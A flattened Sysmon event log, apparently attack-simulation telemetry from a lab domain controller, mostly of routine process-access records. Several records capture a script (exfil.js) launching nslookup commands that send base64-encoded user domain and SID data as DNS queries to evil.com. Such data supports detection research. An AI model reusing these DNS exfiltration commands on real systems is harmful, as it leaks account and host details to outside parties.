10341000x8000000000000000210661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.313{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5244-000000005F02}4904C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.313{2E1864BB-18F0-629A-5044-000000005F02}66041432C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-5244-000000005F02}4904C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.316{2E1864BB-18F0-629A-5244-000000005F02}4904C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-5044-000000005F02}6604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxoam.tmp 2>&1 10341000x8000000000000000210657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.297{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5144-000000005F02}6072C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.297{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5144-000000005F02}6072C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.282{2E1864BB-18F0-629A-5144-000000005F02}60723832C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5044-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.282{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5144-000000005F02}6072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.278{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.278{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.278{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.278{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.278{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5044-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.277{2E1864BB-18E0-629A-6742-000000005F02}39767364C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-5044-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.277{2E1864BB-18F0-629A-5044-000000005F02}6604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxoam.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.260{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliswqh.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.228{2E1864BB-18F0-629A-4E44-000000005F02}72126492C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-4F44-000000005F02}4364C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.228{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-4F44-000000005F02}4364C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.228{2E1864BB-18F0-629A-4D44-000000005F02}34488036C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-4F44-000000005F02}4364C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.229{2E1864BB-18F0-629A-4F44-000000005F02}4364C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-4D44-000000005F02}3448C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliswqh.tmp 2>&1 10341000x8000000000000000210637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.213{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-4E44-000000005F02}7212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.213{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-4E44-000000005F02}7212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.197{2E1864BB-18F0-629A-4E44-000000005F02}72126492C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-4D44-000000005F02}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.197{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 